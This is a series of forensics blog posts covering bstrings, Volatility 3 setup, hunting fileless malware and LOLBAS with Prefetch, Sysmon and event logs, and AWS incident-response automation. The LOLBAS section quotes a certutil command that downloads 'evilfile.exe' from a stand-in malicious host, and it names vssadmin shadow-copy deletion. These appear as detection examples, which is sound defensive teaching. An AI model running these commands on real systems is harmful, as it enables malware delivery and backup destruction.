The bstrings.exe tool operates similarly to strings, but is designed for Windows environments and includes advanced features such as regex support and output saving.

Basic Operation
bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" --ls <string>
This command extracts printable characters from the specified memory dump and searches them for a specific pattern or IOC.
Example :
bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" --ls qemu-img-win-x64-2_3_0.zip

-----------------------------------------------------------------------------------------------

Regex Support
Bstrings offers regex pattern matching, allowing for flexible searches. This can be especially useful when looking for patterns like email addresses, MAC addresses, or URLs.
Example of listing available regex patterns :
bstrings.exe -p
Example of applying a regex pattern for MAC addresses :
bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" --lr mac

-----------------------------------------------------------------------------------------------

Saving the Output
Often, forensic investigators need to save the results for later review or for reporting. Bstrings allows easy output saving:
bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" -o output.txt
This saves the output to output.txt for future reference or detailed analysis.

-----------------------------------------------------------------------------------------------

Practical Scenarios for Memory Forensics

Corrupted Memory Image
In certain cases, memory images may be corrupted or incomplete, and tools like Volatility or MemProcFS may fail to process them. In such scenarios, strings and bstrings.exe can still be incredibly useful by extracting whatever readable data remains, allowing you to salvage critical IOCs.

Quick IOC Identification
These tools are particularly valuable for triage.
During an investigation, quickly scanning a memory dump for IOCs (such as suspicious filenames, IP addresses, or domain names) can direct the next steps of a forensic investigation. If no IOCs are found, the investigator can move on to more sophisticated or time-consuming methods.

-----------------------------------------------------------------------------------------------

Conclusion
Memory forensics is a crucial part of modern incident response, and tools like strings and bstrings.exe can significantly accelerate the process. Their ability to extract readable characters from memory dumps and apply search filters makes them invaluable for forensic investigators, especially in cases where traditional analysis tools may fail.

Key Takeaways :
Strings is ideal for Unix/Linux environments, while Bstrings is tailored for Windows.
Both tools offer powerful search capabilities, including contextual search and offset-based analysis.
Bstrings provides additional features like regex support and output saving.
These tools help quickly identify IOCs, even in challenging scenarios like corrupted memory images.

Whether you're dealing with a large memory dump or a corrupted image, these tools offer a simple yet effective way to sift through data and uncover critical forensic artifacts.

Akash Patel

  • Unveiling Volatility 3: A Guide to Installation and Memory Analysis on Windows and WSL

Today, let's dive into the fascinating world of digital forensics by exploring Volatility 3—a powerful framework used for extracting crucial digital artifacts from volatile memory (RAM). Volatility enables investigators to analyze a system's runtime state, providing deep insights into what was happening at the time of memory capture. While some forensic suites like OS Forensics offer integrated Volatility functionality, this guide will show you how to install and run Volatility 3 on Windows and WSL (Windows Subsystem for Linux). Given the popularity of Windows, it's a practical starting point for many investigators. Moreover, WSL allows you to leverage Linux-based forensic tools, which can often be more efficient.

Installing Volatility 3 on Windows:
Before diving in, ensure you have three essential tools installed:
Python 3: Download Python 3 from the Microsoft Store.
Git for Windows: Click here
Microsoft C++ Build Tool: Download it

Once these tools are installed, follow these steps to set up Volatility 3:
Head to the Volatility GitHub repository here and copy the repository link.
Open PowerShell and run: git clone https://github.com/volatilityfoundation/volatility3.git
Check the Python version using: python -V
Navigate to the Volatility folder in PowerShell and list its contents with DIR (Windows) or ls (Linux).
Run the command: pip install -r .\requirements.txt
Verify the Volatility version: python vol.py -v

Extracting Digital Artifacts:
Now that Volatility is set up, you'll need a memory image to analyze. You can obtain this image using tools like FTK Imager or other image capture tools.

--------------------------------------------------------------------------------------------------------

Here are a few basic commands to get you started:
1. python vol.py -v (Displays tool information).
2. python vol.py -f D:\memdump.mem windows.info
Provides information about the Windows system from which the memory was collected. Replace windows.info with other plugin names for different functionality. D:\memdump.mem is the path of the memory image.
3.
python vol.py -f D:\memdump.mem windows.handles - Lists handles in the memory image. Use -h for the help menu.

Significance of the --pid Parameter in Memory Forensics
Many plugins accept --pid as a parameter, which restricts the output to a specific process ID. This is useful once you have already identified a process of interest.

You might wonder what the point of invoking Volatility 3 through Python is. Consider:
python vol.py -f D:\memdump.mem windows.pslist | Select-String chrome
This command showcases the use of a search string (Select-String) to filter the pslist output for specific processes like 'chrome.' While Select-String isn't part of Volatility 3 itself, combining it with the Python invocation offers functionality similar to 'grep' in Linux, facilitating data extraction based on defined criteria.

Few important commands:
windows.pstree (gives a hierarchical view of processes)
windows.psscan (finds unlinked, hidden processes)
windows.netstat
windows.cmdline (shows what was run, from where it was run, and any special arguments used)
windows.malfind (legitimate processes should return nothing)
windows.hashdump (dumps Windows password hashes)
windows.netscan
windows.ldrmodules - A "True" within a column means the DLL was present, and a "False" means the DLL was not present in that list. By comparing the results, we can visually determine which DLLs might have been unlinked or suspiciously loaded, and hence malicious.

More commands with details can be found in this link: click here

-------------------------------------------------------------------------------------------------------------

Why Switch to WSL for Forensics?
As forensic analysis evolves, using Windows Subsystem for Linux (WSL) has become a more efficient option for running tools like Volatility 3. With WSL, you can run Linux-based tools natively on your Windows machine, giving you the flexibility and compatibility benefits of a Linux environment without the need for dual-booting or virtual machines.

Install WSL by running: wsl --install
https://learn.microsoft.com/en-us/windows/wsl/install

To install Volatility 3 on WSL :
1.
Install Dependencies
Before installing Volatility 3, you need to install the required dependencies:
sudo apt update
sudo apt install -y python3-pip python3-pefile python3-yara

2. Installing PyCrypto (Optional)
While PyCrypto was a common requirement, it is now considered outdated. If installing it works, great! If not, you can move on:
pip3 install pycrypto
If PyCrypto doesn't install correctly, don't worry; Volatility 3 can still function effectively without it in most cases.

3. Clone the Volatility 3 Repository
Next, clone the official Volatility 3 repository from GitHub:
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3

4. Verify the Installation
To confirm that Volatility 3 is installed successfully, run the following command to display the help menu:
python3 vol.py -h | more
If you see the help options, your installation was successful, and you're ready to begin memory analysis.

------------------------------------------------------------------------------------------------------------

Why WSL is Essential for Forensic Analysis
Forensic tools like Volatility 3 often run more smoothly in a Linux environment due to Linux's lightweight nature and better compatibility with certain dependencies and libraries. WSL allows you to run a full Linux distribution natively on your Windows machine without the need for a virtual machine or dual-booting. This means you can enjoy the power and flexibility of Linux while still working within your familiar Windows environment.

----------------------------------------------------------------------------------------------------

Conclusion
Forensic analysis, especially with tools like Volatility 3, becomes far more efficient when leveraging WSL. It offers better performance, compatibility with Linux-based tools, and ease of maintenance compared to traditional Windows installations.
I hope this guide has provided a clear pathway for setting up and running Volatility 3 on both Windows and WSL, empowering you to optimize your forensic workflows. Now, you might wonder: "I’ve given the commands for running Volatility 3 on Windows—what about WSL?" The good news is that the commands remain the same for WSL, as the underlying process is the same; only the environment differs. In upcoming articles, I’ll cover tools like MemProcFS, Strings, and how to perform comprehensive memory analysis using all three. Until then, happy hunting and keep learning! 👋 Akash Patel

  • Fileless Malware || LOLBAS || LOLBAS Hunting Using Prefetch, Event Logs, and Sysmon

Fileless malware refers to malicious software that does not rely on traditional executable files on the filesystem, but it is important to emphasize that "fileless" does not equate to "artifactless." Evidence of such attacks often exists in various forms across the disk and system memory, making it crucial for Digital Forensics and Incident Response (DFIR) specialists to know where to look.

Key Locations for Artifact Discovery
Even in fileless malware attacks, traces can be found in several places:
Evidence of execution: Prefetch, Shimcache, and AppCompatCache
Registry keys: Large binary data or encoded PowerShell commands.
Event logs: Process creation, service creation, and Task Scheduler events.
PowerShell artifacts: PowerShell transcripts and PSReadLine
Scheduled Tasks: Attackers may schedule malicious tasks to persist.
Autorun/Startup keys
WMI Event Consumers: These can be exploited to run malicious code without leaving typical executable traces.

Example 1: DLL Side-Loading with PlugX
DLL side-loading is a stealthy technique used by malware like PlugX, where legitimate software is abused to load malicious DLLs into memory. The typical attack steps involve:
Phishing email : The attacker sends a phishing email to the victim.
Decoy file and dropper : The victim opens a legitimate-looking file (e.g., a spreadsheet) that also delivers the payload.
Dropper execution : A dropper executable (e.g., ews.exe) is saved to disk, dropping several files. One of these, oinfop11.exe, is a legitimate part of Office 2003, making it appear trusted.
Malicious DLL injection : The legitimate executable loads a spoofed DLL (oinfo11.ocx), which decrypts and activates the actual malware.
At this point, the malicious DLL operates in the memory space of a trusted program, evading traditional detection mechanisms.

Example 2: Registry Key Abuse
In another example, attackers may modify the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key.
This key can be used to launch PowerShell scripts via Windows Script Host (WSH), enabling the attacker to execute code every time the system boots up.

Example 3: WMI Event Filters and Fake Updaters
Attackers often leverage WMI (Windows Management Instrumentation) to create event filters that trigger malicious activities, such as launching a fake updater. In this scenario:
WMI uses regsvr32.exe to call out to a malicious site.
The malicious site hosts additional malware files, furthering the attack.

Living Off the Land (LOLBAS) Attacks
Living Off the Land Binaries and Scripts (LOLBAS) refer to legitimate tools and binaries that attackers exploit for malicious purposes, reducing the need to introduce new files to the system. This approach makes detection more challenging since the binaries are usually trusted system files.

The LOLBAS Project
The LOLBAS Project on GitHub compiles data on legitimate Windows binaries and scripts that can be weaponized by attackers (GTFOBins is the equivalent project for Unix-like systems):
https://gtfobins.github.io/
https://lolbas-project.github.io/
The project categorizes these tools based on their functions, including:
Alternate Data Streams (ADS) manipulation
AWL bypasses (e.g., bypassing AppLocker)
Credential dumping and code compilation
Reconnaissance and UAC bypasses

Common LOLBAS in Use
Several Windows binaries are frequently misused in the wild:
CertUtil.exe
Regsvr32.exe
RunDLL32.exe
ntdsutil.exe
Diskshadow.exe

Example: CertUtil Misuse
An example of CertUtil.exe being misused involves downloading a file from a remote server. The command used is:
certutil.exe -urlcache -split -f http[:]//192.168.182.129[:]8000/evilfile.exe goodfile.exe
Several detection points exist here:
Command-line arguments : Detect unusual arguments like urlcache using Event ID 4688 (Windows) or Sysmon Event ID 1.
File creation : Detect CertUtil writing to disk using Sysmon Event ID 11 or endpoint detection and response (EDR) solutions.
Network activity : CertUtil making network connections on non-standard HTTPS ports is unusual and should be flagged.

----------------------------------------------------------------------------------------------

1. Hunting LOLBAS Execution with Prefetch
LOLBAS (Living Off the Land Binaries and Scripts) refers to the use of legitimate binaries, often pre-installed on Windows systems, that attackers can misuse for malicious purposes. Tools like CertUtil.exe, Regsvr32.exe, and PowerShell are frequently used in these attacks. Hunting for these within enterprise environments requires collecting data from various sources such as prefetch files, event logs, and process data.

Prefetch Hunting Tips :
Prefetch data is stored in the C:\Windows\Prefetch folder and provides insight into recently executed binaries.
Velociraptor is a great tool for collecting and analyzing prefetch files across an enterprise environment.
Running a regex search for specific LOLBAS tools such as sdelete.exe, certutil.exe, or taskkill.exe can help narrow down suspicious executions.
To perform a regex search using Velociraptor:
Step 1 : Collect prefetch files.
Step 2 : Apply regex filters to search for known LOLBAS tools.

Key Considerations :
Prefetch hunting can be noisy due to legitimate execution of trusted binaries.
Analyze the paths used by the binaries. For example, C:\Windows\System32\spool\drivers\color\ is commonly abused due to its write permissions.
Look for rarely seen executables or unusual paths that might indicate lateral movement or privilege escalation.

2. Intelligence Gathering: Suspicious Emails and Threat Hunts
When a suspicious email is reported, especially after an initial compromise:
SOC actions : SOC analysts may update email filters and remove copies from the mail server, but they must also hunt across endpoints for signs of delivery. Using the SHA1 hash of the malicious file can help locate copies on other endpoints.
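As a minimal illustration of the hash-matching idea itself (not the Velociraptor workflow), the same check can be sketched with coreutils; the directory, file name, and "malicious" content below are all fabricated for the demo:

```shell
# Simulate the reported attachment and record its SHA1 as the IOC
mkdir -p /tmp/hunt-demo
printf 'malicious payload' > /tmp/hunt-demo/invoice.xls.exe
ioc_sha1=$(sha1sum /tmp/hunt-demo/invoice.xls.exe | awk '{print $1}')

# Sweep a directory tree (a stand-in for an endpoint's filesystem) and
# print the path of every file whose SHA1 matches the IOC hash
find /tmp/hunt-demo -type f -exec sha1sum {} + |
  awk -v ioc="$ioc_sha1" '$1 == ioc {print "MATCH:", $2}'
```

Enterprise tooling scales this same comparison across thousands of endpoints instead of one directory tree.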
For example, you can use Velociraptor with Generic.Forensic.LocalHashes.Init to build a hash database, and then populate it with Generic.Forensic.LocalHashes.Glob.

3. Endpoint Data Hunting
Key areas for LOLBAS detection on endpoints:
Prefetch Files : As mentioned, rarely used executables like CertUtil or Regsvr32 may signal LOLBAS activity.
Running Processes : Collect processes from all endpoints. Uncommon processes, especially those tied to known LOLBAS binaries, should be investigated.

4. SIEM and Event Log Analysis
Event logs and SIEM tools offer key visibility for LOLBAS detection:
Sysmon Event 1 (Process Creation) : Captures process creation events and contains critical information like command-line arguments and file hashes.
Windows Security Event 4688 : This event captures process creation, and when paired with Event 4689 (process termination), it provides complete context for process lifetime, which can be useful in detecting LOLBAS activity.

Common LOLBAS Detection via Event Logs :
CertUtil.exe : Detect by filtering for the user agent string Microsoft-CryptoAPI/*.
PowerShell : Detect suspicious PowerShell execution using its user agent string: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.610
BITS : Detect via the user agent string Microsoft BITS/*.

-----------------------------------------------------------------------------------------------------------

1. Hunting Process Creation Events with Sysmon (Event ID 1)
Sysmon's Event ID 1 (Process Creation) is a critical log for detecting Living Off the Land Binaries and Scripts (LOLBAS) attacks, as it provides detailed information about processes that are started on endpoints. However, since LOLBAS attacks often use legitimate, signed executables, it's essential to look beyond basic indicators like file hashes.
Key information from Sysmon Event ID 1  includes: Process Hash : While helpful for detecting malicious software, it is less useful for LOLBAS because the executables involved are usually Microsoft-signed binaries, which are seen as legitimate. Parent Command Line : The parent process command line can be very informative in some situations, especially when exploring more advanced attack chains. However, for many LOLBAS hunts, it might just indicate cmd.exe or explorer.exe, which are often used as the parent processes in these attacks. 2. Windows Security Event 4688 (Process Creation) Windows Security Event 4688  is another valuable source for capturing process creation data. For LOLBAS hunting, focusing on a few key fields in Event 4688 is particularly useful: Parent Process : Although often cmd.exe or explorer.exe , this information can reveal if the process was initiated by a legitimate GUI or a script , or if it was spawned by a more suspicious process like w3wp.exe (IIS) running CertUtil.exe. If the parent process is something like IIS or a PowerShell script , it suggests automation or an attack executed remotely (e.g., via a webshell). Process Command Line : This is critical because it includes any arguments passed to the executable . In LOLBAS attacks, unusual command-line switches or paths used by trusted binaries (like CertUtil.exe -urlcache) can reveal malicious intent. Token Elevation Type : %%1936 : Full token with all privileges, suggesting no UAC restriction . %%1937 : Elevated privileges, indicating that a user has explicitly run the application with “Run as Administrator.” %%1938 : Normal user privileges. These indicators are helpful to see if the binary was executed with elevated permissions , which could hint at privilege escalation attempts. 3. Windows Firewall Event Logs for LOLBAS Detection Firewalls can provide additional information about LOLBAS activities , particularly in relation to network-based attacks . 
Event logs such as 5156  (allowed connection) or 5158  (port binding) can help spot outbound connections initiated by LOLBAS binaries like CertUtil.exe or Bitsadmin.exe. Key fields in firewall logs: Process ID/Application Name : This tells you which binary initiated the network connection. Tracking legitimate but rarely used binaries (e.g., CertUtil) making outbound connections to unusual IP addresses can indicate an attack. Destination IP Address : Correlating this with known good IPs or threat intelligence data is critical to confirm whether the connection is benign or suspicious. 4. Event Log Analysis for LOLBAS For deeper LOLBAS detection, multiple event logs should be analyzed together: 4688 : Logs the start of a process (the key event for initial execution detection). 4689 : Logs the end of a process , providing insights into how long the process was running and whether it completed successfully. 5156 and 5158 : Track firewall events, focusing on port binding and outbound connections. Any outbound traffic initiated by unusual executables like Bitsadmin.exe or CertUtil.exe should be scrutinized. 5. Detecting Ransomware Precursors with LOLBAS Many ransomware attacks involve the use of LOLBAS commands to weaken defenses or prepare the environment for encryption: Disabling security tools : Commands like taskkill.exe or net stop are used to terminate processes that protect the system . Firewall/ACL modifications : netsh.exe might be used to modify firewall rules to allow external connections. Taking ownership of files : This ensures the ransomware can encrypt files unhindered. Disabling backups/Volume Shadow Copies : Commands like vssadmin.exe delete shadows are common to prevent file recovery. Since these activities often involve legitimate system tools, auditing these actions can serve as an early warning. 6. 
Improving Detection with Windows Auditing For better detection of LOLBAS attacks and ransomware precursors, implement the following Windows auditing  settings: Process Creation Auditing : Auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable This ensures that every process creation event is logged, which is crucial for identifying LOLBAS activity. Command Line Auditing : reg add "hklm\software\microsoft\windows\currentversion\policies\system\audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 Enabling command-line logging is crucial because LOLBAS binaries often need unusual arguments to perform malicious actions. PowerShell Logging : reg add "hklm\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" /v EnableModuleLogging /t REG_DWORD /d 1 reg add "hklm\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" /v EnableScriptBlockLogging /t REG_DWORD /d 1 PowerShell script block logging captures the full content of commands executed within PowerShell, which is a key LOLBAS tool used for various attacks. 7. Sysmon: Enhanced Visibility for LOLBAS Deploying Sysmon  enhances your visibility into system activities, especially for LOLBAS detection: File Hashes : Sysmon captures the hash of the executing file , which is less helpful for LOLBAS as these files are usually legitimate. However, the combination of the file hash with process execution data can still provide context. Process Command Line : Sysmon logs detailed command-line arguments, which are crucial for spotting LOLBAS attacks . The presence of rarely used switches or network connections from unexpected binaries is a red flag. Because Sysmon captures more detailed process creation data than Windows Security Events, it’s a preferred tool for more advanced hunting, especially when dealing with stealthy attacks involving LOLBAS tools. 8. 
Sigma Rules for LOLBAS Detection Sigma rules provide a framework for creating reusable detection logic that can work across different platforms and SIEM solutions. Using Sigma, you can write detection logic in a human-readable format and then convert it into SIEM-specific queries using tools like Uncoder.io . Advantages of Sigma : Detection logic is SIEM-agnostic . This allows you to use the same detection rules even if your organization switches SIEM platforms. Sigma rules can be easily integrated with Sysmon , Windows Security Events , and other logging tools, making them highly adaptable. By using Sigma for LOLBAS detection, you ensure consistent alerts across all environments. 9. Practical Example of LOLBAS Detection: CertUtil Here’s an example of how CertUtil.exe  might be used in an attack: certutil.exe -urlcache -split -f http[:]//malicious-site[.]com/evilfile.exe goodfile.exe This command downloads a file from a remote server and stores it on the local system. While CertUtil  is a legitimate Windows tool for managing certificates, it can be misused for file downloads. Sysmon Event 1 : You would capture the process command line   and see the -urlcache argument, which is rare in normal usage. Firewall Event 5156 : Logs the connection attempt from CertUtil.exe   to the malicious IP. Security Event 4688 : Logs the creation of CertUtil.exe , providing the process ID and command-line arguments. Conclusion: Effectively hunting LOLBAS and fileless malware requires a combination of detailed event logging, process monitoring, prefetch analysis, and centralized log management. By leveraging tools like Sysmon , Velociraptor , and Sigma, organizations can strengthen their detection capabilities and proactively defend against stealthy attacks that rely on legitimate system tools to evade traditional security measures. Akash Patel

  • Leveraging Automation in AWS for Digital Forensics and Incident Response

For those of us working in digital forensics and incident response (DFIR), keeping up with the cloud revolution can feel overwhelming at times. We're experts in tracking down security incidents and understanding what went wrong, but many of us aren't DevOps engineers by trade. That's okay—it's not necessary to become a full-time cloud architect to take advantage of the powerful automation tools and workflows available in platforms like AWS. Instead, we can collaborate with engineers and developers who specialize in these areas to create effective, scalable solutions that align with our needs.

-----------------------------------------------------------------------------------------------------------

Getting Started with Cloud-Based Forensics
For those who are new to the cloud or want a quick start to cloud forensics, Amazon Machine Images (AMIs) are a great option. AMIs are pre-configured templates that contain the information required to launch an instance. If you're not yet ready to build your own custom AMI, there are existing ones you can use.

SIFT (SANS Investigative Forensic Toolkit) is a popular option for forensics analysis and is available as an AMI. While it's not listed on the official AWS Marketplace, you can find the latest AMI IDs on the GitHub page and launch them from the EC2 console.
https://github.com/teamdfir/sift#aws

Security Onion is another robust tool for network monitoring and intrusion detection. They publish their releases as AMIs, although there's a small charge to cover regular update services. If you want full control, you can build your own AMI from their free distribution.

As your team grows in its cloud forensics capabilities, you may want to create custom AMIs to fit specific use cases. EC2 Image Builder is a helpful AWS service that makes it easy to create and update AMIs, complete with patches and any necessary updates.
This ensures that you always have a reliable, up-to-date image for your incident response efforts.

-----------------------------------------------------------------------------------------------------------

Infrastructure-as-Code: A Scalable Approach to Forensics Environments

As your organization expands its cloud infrastructure, it's essential to deploy forensics environments quickly and consistently. This is where Infrastructure-as-Code (IaC) comes into play. IaC allows you to define and manage your cloud resources using code, making environments easily repeatable and reducing the risk of configuration drift.

One of the key principles of IaC is idempotence: no matter the current state of your environment, running the IaC script will bring everything to the desired state. This makes it easier to ensure that forensic environments are deployed consistently and accurately every time.

-----------------------------------------------------------------------------------------------------------

CloudFormation and Terraform

AWS provides its own IaC tool called CloudFormation, which uses JSON or YAML files to define and automate resource configurations. AWS also offers CloudFormation templates for various use cases, including incident response workflows. These templates can be adapted to fit your specific needs, making it easy to set up response environments quickly. You can explore some ready-to-use templates: https://aws.amazon.com/cloudformation/resources/templates/

However, if your organization operates across multiple cloud providers, such as Azure, Google Cloud, or DigitalOcean, you might prefer an agnostic solution like Terraform. Terraform, developed by HashiCorp, allows you to write a single set of scripts that can be applied to various cloud platforms, streamlining deployment across your entire infrastructure.
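To give a feel for the format, here is a minimal sketch of a CloudFormation template that stands up a single analysis instance from a forensics AMI. The parameter name and instance type are illustrative choices, not taken from an official AWS incident response template.

```yaml
AWSTemplateFormatVersion: '2010-09-09'
Description: Minimal forensics analysis instance (illustrative sketch)
Parameters:
  AnalysisAmiId:
    Type: AWS::EC2::Image::Id
    Description: Forensics AMI to launch (e.g. a SIFT or custom image)
Resources:
  AnalysisInstance:
    Type: AWS::EC2::Instance
    Properties:
      ImageId: !Ref AnalysisAmiId
      InstanceType: t3.large
      Tags:
        - Key: Purpose
          Value: incident-response
```

Because templates like this are idempotent, re-deploying the stack converges the environment to the same defined state every time, which is exactly the property you want for repeatable forensics environments.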
-----------------------------------------------------------------------------------------------------------

Automating Forensic Tasks with AWS Lambda

One of the most exciting aspects of cloud-based forensics is the potential for automation, and AWS Lambda is a key player in this space. Lambda lets you run code without provisioning servers, and it's event-driven, meaning it automatically executes tasks in response to certain triggers. This is perfect for incident response, where every second counts. https://aws.amazon.com/lambda/faqs/

For example, let's say you've set up a write-only S3 bucket for triage data. Lambda can be triggered whenever a new file is uploaded, automatically kicking off a series of actions such as running a triage analysis script or notifying your response team. The best part is that you're only charged for the execution time, not for keeping a server running 24/7.

Lambda supports multiple programming languages, including Python, Node.js, Java, Go, Ruby, C#, and PowerShell. This flexibility makes it easy to integrate with existing workflows, no matter what scripting languages you're comfortable with. https://github.com/awslabs/

-----------------------------------------------------------------------------------------------------------

AWS Step Functions: Orchestrating Complex Workflows

While Lambda excels at executing individual tasks, AWS Step Functions allow you to orchestrate complex, multi-step workflows. In the context of incident response, this means you can automate an entire forensics investigation, from capturing an EC2 snapshot to running analysis scripts and generating reports.

One example of a Step Functions workflow comes from the AWS Labs project titled "EC2 Auto Clean Room Forensics". Here's how the workflow operates:

- Capture a snapshot of the target EC2 instance's volumes.
- Notify the team via Slack that the snapshot is complete.
- Isolate the compromised EC2 instance.
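The S3-triggered pattern described above boils down to a small Lambda handler. The sketch below only parses the S3 event and hands the object off; queue_triage is a hypothetical placeholder for whatever analysis or notification logic your team wires in.

```python
def queue_triage(bucket, key):
    """Placeholder for real work: start an analysis job, ping the team, etc."""
    return f"s3://{bucket}/{key}"

def handler(event, context):
    """Entry point for an S3-triggered Lambda.

    AWS invokes this with an event describing the uploaded object(s);
    we extract each bucket/key pair and pass it to the triage routine.
    """
    results = []
    for record in event.get("Records", []):
        bucket = record["s3"]["bucket"]["name"]
        key = record["s3"]["object"]["key"]
        results.append(queue_triage(bucket, key))
    return {"processed": results}
```

Configured as the notification target of the write-only triage bucket, this runs only when evidence actually lands, so you pay for seconds of execution rather than an always-on server.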
- Create a pristine analysis instance and mount the snapshot.
- Use the AWS Systems Manager (SSM) agent to run forensic scripts on the instance.
- Generate a detailed report.
- Notify the team when the investigation is complete.

This kind of automation significantly speeds up the forensic process, allowing your team to focus on higher-level analysis rather than repetitive tasks.

-----------------------------------------------------------------------------------------------------------

Other Automation Options for Forensics in the Cloud

If you don't have the resources or time to dive deep into AWS-specific solutions, there are plenty of other automation options available that work across cloud platforms. For instance, dfTimewolf, developed by Google's IR team, is a Python-based framework designed for automating DFIR workflows. It includes recipes for AWS, Google Cloud Platform (GCP), and Azure, allowing you to streamline evidence staging and processing across multiple cloud environments.

Alternatively, if you're comfortable with shell scripting and the AWS CLI, you can develop your own lightweight automation scripts. For example, Recon InfoSec has released a simple yet powerful project that ingests triage data from S3 and processes it in Timesketch. This is an excellent way to automate data handling without building a complex pipeline from scratch.

https://dftimewolf.readthedocs.io/en/latest/developers-guide.html
https://libcloud.apache.org/index.html
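As a taste of what such a lightweight script might do, the sketch below generates AWS CLI commands for the first two clean-room steps: snapshot each volume of a suspect instance, then move the instance onto a quarantine security group. All IDs are placeholders, and the quarantine security group (one with no permitted traffic) is assumed to already exist.

```python
import shlex

def snapshot_and_isolate_cmds(instance_id, volume_ids, quarantine_sg):
    """Build AWS CLI calls: one create-snapshot per volume, then swap the
    instance's security groups to the quarantine group to isolate it."""
    cmds = [
        ["aws", "ec2", "create-snapshot",
         "--volume-id", vol,
         "--description", f"IR evidence from {instance_id}"]
        for vol in volume_ids
    ]
    cmds.append(["aws", "ec2", "modify-instance-attribute",
                 "--instance-id", instance_id,
                 "--groups", quarantine_sg])
    return cmds

# Placeholder IDs -- substitute the real instance, volumes, and group.
for cmd in snapshot_and_isolate_cmds("i-0abc", ["vol-01", "vol-02"], "sg-quarantine"):
    print(shlex.join(cmd))
```

Emitting the commands for review first, rather than executing them blindly, keeps a human in the loop during early practice runs; once trusted, the same logic can be handed to subprocess calls or folded into a Step Functions state.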
By practicing response scenarios, whether using AWS Step Functions, Terraform, or even simple CLI scripts, you can identify gaps in your processes and make improvements before a real incident occurs.

AWS also provides several incident response simulations that allow you to practice responding to real-world scenarios. These are excellent resources to test your workflows and ensure that your team is always ready.

-----------------------------------------------------------------------------------------------------------

Conclusion

Stay proactive by experimenting with these technologies, practicing regularly, and continuously refining your workflows. Cloud adoption is accelerating, and with it comes the need for robust, automated incident response strategies that can keep up with this evolving landscape.

Akash Patel
